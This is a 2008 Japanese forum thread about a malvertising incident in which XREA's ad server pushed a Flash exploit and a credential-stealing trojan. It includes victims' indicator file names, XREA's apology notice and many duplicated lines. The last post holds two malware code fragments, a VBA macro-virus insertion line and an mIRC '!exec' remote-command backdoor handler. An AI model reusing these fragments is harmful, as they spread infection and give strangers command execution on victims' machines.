XREAの広告にAdobe Flash Playerの脆弱性をついたスクリプトが混入
71 : 人造人間20号(久留米):2008/06/16(月) 01:08:19.35 ID:fB00cNxL0
何が仕込まれちゃうの?おせーて
72 : シェンロン(秋田県):2008/06/16(月) 01:26:47.32 ID:hfSP8fSk0 BE:314007277-PLT(12346)
73 : シェンロン(秋田県):2008/06/16(月) 01:29:52.25 ID:hfSP8fSk0 BE:230699366-PLT(12346)
また中華のMMOのアカウント盗むやつっぽい
74 : イチオッツ(横浜):2008/06/16(月) 01:34:06.82 ID:344ASz6fO
時代はTok2とぶっとびネット、あとフリーなんとかシアター
75 : ブラ(巣鴨):2008/06/16(月) 04:25:01.22 ID:kLlgPTDG0
ばかやろう、俺のサイト経由でも感染してんじゃねーか。
avast!でモロ引っかかってやがったぜ。
でも、独自ドメインなのに訪れんの俺と家族だけなのよねー(T◇T)。
avast!でモロ引っかかってやがったぜ。
でも、独自ドメインなのに訪れんの俺と家族だけなのよねー(T◇T)。
76 : ブリッグ(佐賀県):2008/06/16(月) 04:26:00.07 ID:rkxvVfbi0
>>1
ご激怒って何よ
ご激怒って何よ
77 : アン=カーミス(長野県):2008/06/16(月) 04:27:44.23 ID:ghzOSyds0
ニコニコ死亡ってことですね。わかります。
78 : キ・シュツ(コネチカット州):2008/06/16(月) 04:33:09.76 ID:iPAlhppmO
>>75
晒してくれたら遊びに行くよ。
晒してくれたら遊びに行くよ。
これなー
AVGがorz.exeってやつを検出した。これはすぐ隔離したから大丈夫だったんだけど、
念のためにスキャンしたらtaa[1].gifってファイルが隠れてた。
こっちには反応しなかったんだよな…
AVGがorz.exeってやつを検出した。これはすぐ隔離したから大丈夫だったんだけど、
念のためにスキャンしたらtaa[1].gifってファイルが隠れてた。
こっちには反応しなかったんだよな…
80 : ヘンナナ・ガレ(岡山県):2008/06/16(月) 08:13:23.60 ID:A92Ofxyw0
taa[1].gif ってなによ
82 : ヒソクサリ(埼玉県):2008/06/16(月) 09:49:43.64 ID:QvlekL3t0
この脆弱性ネトゲでえらい被害出てるよ
昔はゲーム内BOT程度だったんだけど
どんどんエスカレートしてアカハック、今や完全に犯罪
そのうち銀行口座とかやり始めんじゃねーの
昔はゲーム内BOT程度だったんだけど
どんどんエスカレートしてアカハック、今や完全に犯罪
そのうち銀行口座とかやり始めんじゃねーの
糞レア
ネットゲームのパスワードだけしか盗まれないと、安心していたら
銀行のパスワードを盗まれたでござるの巻
銀行のパスワードを盗まれたでござるの巻
ネトゲのパス抜いても日本の警察は中国には手出せない
それを知っててやってるんだろう
銀行のパス抜いたらさすがにやばいんじゃないかな
それを知っててやってるんだろう
銀行のパス抜いたらさすがにやばいんじゃないかな
86 : オムル・ハング(巣鴨):2008/06/16(月) 11:51:11.31 ID:QqoNxApi0
taa[1].gifで検索したけど出てこなかった。Adobe Flash Playerが最新だったもより。
87 : シェンロン(東北地方):2008/06/16(月) 13:47:19.84 ID:xSZoMAMi0
放置ワロタw
xrea使ってるサイトはちょっとお高くとまってたりするのが多いから、
ザマーみろだw
xrea使ってるサイトはちょっとお高くとまってたりするのが多いから、
ザマーみろだw
88 : バビディ(愛知県):2008/06/16(月) 13:53:09.09 ID:trh4GXVj0
javaスクリプトとか切っておけよ・・・
ALEXAツールは正直ウィルス。
海外のサイトまわってると感染する。
海外のサイトまわってると感染する。
90 : シェンロン(東北地方):2008/06/16(月) 16:40:13.17 ID:xSZoMAMi0
・グーグルに報告してインデックスを削除してもらう
・レジストラに報告してxrea.comドメインの停止
これが必要だろ
・レジストラに報告してxrea.comドメインの停止
これが必要だろ
昔、上位レジストラからxreaのドメインが停止された時の理由が
フィッシングサイトを消さなかったからというものだったよね。
そして今回はトロイのバラまきを猛々しく続けるxreaなわけだが、
また制裁でドメイン停止とかされないのかちょっと心配。
フィッシングサイトを消さなかったからというものだったよね。
そして今回はトロイのバラまきを猛々しく続けるxreaなわけだが、
また制裁でドメイン停止とかされないのかちょっと心配。
92 : パオロ・カシアス(巣鴨):2008/06/16(月) 17:24:27.88 ID:OGWVNeYK0
XREAって何て読むの?サイゼリア?
93 : チャー・フイター(新潟県):2008/06/16(月) 17:36:48.48 ID:IU00cLNk0
>>92
「クソりゃー」が正解です
「クソりゃー」が正解です
で、まだ直ってないの?
この会社はペーパーカンパニーか何かなの?
この会社はペーパーカンパニーか何かなの?
96 : ドーシタイン(鳥取県):2008/06/16(月) 20:06:41.97 ID:y+j7w3iz0
>>75
今回のウィルスはavastでも防げたの?
今回のウィルスはavastでも防げたの?
97 : マージ・レスキン氏(巣鴨):2008/06/16(月) 21:59:24.39 ID:l9DLWE5v0
それよりアクセス解析のエラー直せ
金払ってるのに詐欺だぞ
金払ってるのに詐欺だぞ
99 : ブルマ(福岡県):2008/06/16(月) 22:26:04.45 ID:tr7wcplP0
>>97
XREAの無料広告は5つの広告サーバーからランダムで選択され表示されるんだが、
うち1つが汚染され、そこ経由の広告が表示されると埋め込まれたJavascriptが自動的に実行>害swf実行>ウィルスexeダウンロード
という流れらしい。
XREAの無料広告は5つの広告サーバーからランダムで選択され表示されるんだが、
うち1つが汚染され、そこ経由の広告が表示されると埋め込まれたJavascriptが自動的に実行>害swf実行>ウィルスexeダウンロード
という流れらしい。
100 : マーカー・クラン(埼玉県):2008/06/16(月) 23:19:01.73 ID:GCaex3vB0
ぱっとXREA
101 : 皇帝ハーン(埼玉県):2008/06/16(月) 23:23:34.26 ID:0EeyYoad0
>>1
激怒に御は使わない
激怒に御は使わない
102 : カイ・シデン(秋田県):2008/06/16(月) 23:28:41.34 ID:v9wfopwy0
自宅鯖やってるけど全然使わないで広告入りのレンタル鯖使ってるわ
103 : ニンキーニ・シット(大分県):2008/06/17(火) 10:28:58.43 ID:bn+y9/5O0
ウィルス感染しているかの確認方法 まとめ
97 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/06/16(月) 04:25:38 0
>>96
とりあえずorz.exeとi115.swfがPC内に紛れてないか検索しとけ、今回の犯人
あとカスペルスキーのオンラインスキャンお勧め
102 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/06/16(月) 07:49:13 0
>>97
taa.gif(orz.exeのドロップ前の名前)、
sonb32drv.dll(orz.exeがドロップするトロイ)も追加で。
97 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/06/16(月) 04:25:38 0
>>96
とりあえずorz.exeとi115.swfがPC内に紛れてないか検索しとけ、今回の犯人
あとカスペルスキーのオンラインスキャンお勧め
102 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/06/16(月) 07:49:13 0
>>97
taa.gif(orz.exeのドロップ前の名前)、
sonb32drv.dll(orz.exeがドロップするトロイ)も追加で。
104 : スレチョウ副大統領(山口県):2008/06/17(火) 11:09:54.38 ID:bHnPS5260
ん
105 : アムロ・レイ(巣鴨):2008/06/17(火) 12:55:03.06 ID:6dOgzPF30
_∧_∧_∧_∧_∧_∧_∧_∧_
デケデケ | |
ドコドコ < 倒 産 ま だ ー ? >
☆ ドムドム |_ _ _ _ _ _ _ _ _ _|
☆ ダダダダ! ∨ ∨ ∨ ∨ ∨ ∨ ∨ ∨ ∨
ドシャーン! ヽ オラオラッ!! ♪
=≡= ∧_∧ ☆
♪ / 〃(・∀・ #) / シャンシャン
♪ 〆 ┌\と\と.ヾ∈≡∋ゞ
|| γ ⌒ヽヽコ ノ ||
|| ΣΣ .|:::|∪〓 || ♪
./|\人 _.ノノ _||_. /|\
ドチドチ!
デケデケ | |
ドコドコ < 倒 産 ま だ ー ? >
☆ ドムドム |_ _ _ _ _ _ _ _ _ _|
☆ ダダダダ! ∨ ∨ ∨ ∨ ∨ ∨ ∨ ∨ ∨
ドシャーン! ヽ オラオラッ!! ♪
=≡= ∧_∧ ☆
♪ / 〃(・∀・ #) / シャンシャン
♪ 〆 ┌\と\と.ヾ∈≡∋ゞ
|| γ ⌒ヽヽコ ノ ||
|| ΣΣ .|:::|∪〓 || ♪
./|\人 _.ノノ _||_. /|\
ドチドチ!
106 : ブラクラ中尉(沖縄県):2008/06/17(火) 14:30:22.96 ID:il68LN000
xreaざまあw
広告踏んだかもしれない俺も涙目w
広告踏んだかもしれない俺も涙目w
107 : バンマス(神奈川県):2008/06/17(火) 16:51:17.21 ID:5/3m6m7k0
Jane Styleがxrea.comだけど大丈夫なの?
108 : ベジータ(東北地方):2008/06/17(火) 19:03:39.16 ID:qyGg9OhF0
無料ユーザー向け広告配信サーバーの不具合について
下記内容で、広告配信用キャッシュサーバーで不正なファイルが設置されている不具合が発生しておりました。
○内容:
現在、5台を広告配信用キャッシュサーバーとして運用していますが、その中の1台で6月初旬から不正なページが設置されておりました。
このため、無料ユーザー様のページ内に自動挿入される広告にて不具合が発生しました。アドレスは「imgj.xrea.com」となります。
○対応:
サーバーを初期状態に戻し復旧しております。
○原因:
外部委託し運用しているため、不正なページの設置が、サーバー外部からなのか、内部からなのか、どのようなページなのかなど詳細については、
現在も調査中となっております。わかり次第、追って、アナウンス、修正させていただきます。
○今後の対策:
コスト削減のため、外部委託で管理しておりますが、このため弊社側で、ログインができなかったなど、多々問題が発生し、多々ご迷惑をお掛けしました。
正当な理由にはなりませんが、無料サーバー部門については完全な赤字となっており、なるべくコスト削減を行い、長期運営を図るよう努力してまいりました。
現在もドメインのご利用のお客様を中心に新たにご利用が増加している状況にあります。
しかし、有料契約のお客様以上に頻発する規約違反への対応問題などで、コストは増加する一方で、かつ、管理における問題も発生する状況になっております。
ご利用のお客様にもご迷惑をお掛けするのは決して許されませんが、それ以外の外部の方にもご迷惑をお掛けする許されない状況
(迷惑メール、スパムブログ等々)が増えつつある事実があります。
8月にて無料サーバー開始から8年となります。今後の無料サーバー自体の方向性も含め見直しを図る所存です。
また、各サービスにおいて、再び、自社で管理する体制に順次戻していく予定です。
この度はご迷惑をお掛けし大変申し訳ございません。
以上、よろしくお願い申し上げます。
ttp://sb.xrea.com/showthread.php?t=12839
下記内容で、広告配信用キャッシュサーバーで不正なファイルが設置されている不具合が発生しておりました。
○内容:
現在、5台を広告配信用キャッシュサーバーとして運用していますが、その中の1台で6月初旬から不正なページが設置されておりました。
このため、無料ユーザー様のページ内に自動挿入される広告にて不具合が発生しました。アドレスは「imgj.xrea.com」となります。
○対応:
サーバーを初期状態に戻し復旧しております。
○原因:
外部委託し運用しているため、不正なページの設置が、サーバー外部からなのか、内部からなのか、どのようなページなのかなど詳細については、
現在も調査中となっております。わかり次第、追って、アナウンス、修正させていただきます。
○今後の対策:
コスト削減のため、外部委託で管理しておりますが、このため弊社側で、ログインができなかったなど、多々問題が発生し、多々ご迷惑をお掛けしました。
正当な理由にはなりませんが、無料サーバー部門については完全な赤字となっており、なるべくコスト削減を行い、長期運営を図るよう努力してまいりました。
現在もドメインのご利用のお客様を中心に新たにご利用が増加している状況にあります。
しかし、有料契約のお客様以上に頻発する規約違反への対応問題などで、コストは増加する一方で、かつ、管理における問題も発生する状況になっております。
ご利用のお客様にもご迷惑をお掛けするのは決して許されませんが、それ以外の外部の方にもご迷惑をお掛けする許されない状況
(迷惑メール、スパムブログ等々)が増えつつある事実があります。
8月にて無料サーバー開始から8年となります。今後の無料サーバー自体の方向性も含め見直しを図る所存です。
また、各サービスにおいて、再び、自社で管理する体制に順次戻していく予定です。
この度はご迷惑をお掛けし大変申し訳ございません。
以上、よろしくお願い申し上げます。
ttp://sb.xrea.com/showthread.php?t=12839
109 : キツネリス(巣鴨):2008/06/17(火) 19:25:10.28 ID:poalZBFs0
そういえばadobe flashの更新がこの間来てたなぁ
これ関連なのかな?
これ関連なのかな?
110 : 小和田 仁成(巣鴨):2008/06/17(火) 21:53:22.66 ID:KCc36l470
>正当な理由にはなりませんが、無料サーバー部門については完全な赤字となっており、
>しかし、有料契約のお客様以上に頻発する規約違反への対応問題などで、コストは増加する一方で、
なんだこれ 部活かなんかで運営してんのかよ
>しかし、有料契約のお客様以上に頻発する規約違反への対応問題などで、コストは増加する一方で、
なんだこれ 部活かなんかで運営してんのかよ
111 : ムッシュ ロイ・キロ(愛知県):2008/06/17(火) 22:16:54.88 ID:kueASNkW0
Flash更新してないけどやばいの?
xreaのページなんてどこにでもあるしおそらく踏んでるし
バスター先生対応してなさげだし・・・
xreaのページなんてどこにでもあるしおそらく踏んでるし
バスター先生対応してなさげだし・・・
112 : けんけつちゃん(東京都):2008/06/17(火) 22:35:30.73 ID:6p5NyS2Z0
>>111
感染してもPCへの破壊活動とかはない
オンゲのアカウント乗っ取られたり
(キャラクターの有り金持ち物下手すりゃキャラごと無くなる)
ミクシーやメッセの情報抜かれたり
(友人知人に親しげにウイルス送りつけて感染させたり)
する程度だから安心しろ。
感染してもPCへの破壊活動とかはない
オンゲのアカウント乗っ取られたり
(キャラクターの有り金持ち物下手すりゃキャラごと無くなる)
ミクシーやメッセの情報抜かれたり
(友人知人に親しげにウイルス送りつけて感染させたり)
する程度だから安心しろ。
113 : ムッシュ ロイ・キロ(愛知県):2008/06/17(火) 22:57:55.85 ID:kueASNkW0
安心しろってウイルス送りつけて感染させるとかめっちゃ悪質だろうにw
114 : けんけつちゃん(東京都):2008/06/17(火) 23:04:20.20 ID:6p5NyS2Z0
無料全部止めちまえ、ドメインと有料サービスだけやれよ
118 : G.O.バーク(福岡県):2008/06/18(水) 10:28:05.85 ID:Q026oL1q0
>>116
ちょっwww勘弁してくれwwww
ちょっwww勘弁してくれwwww
119 : ゴル(巣鴨):2008/06/18(水) 11:05:24.46 ID:qDoIn2Sh0
120 : ナーラ・クルーナー(神奈川県):
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-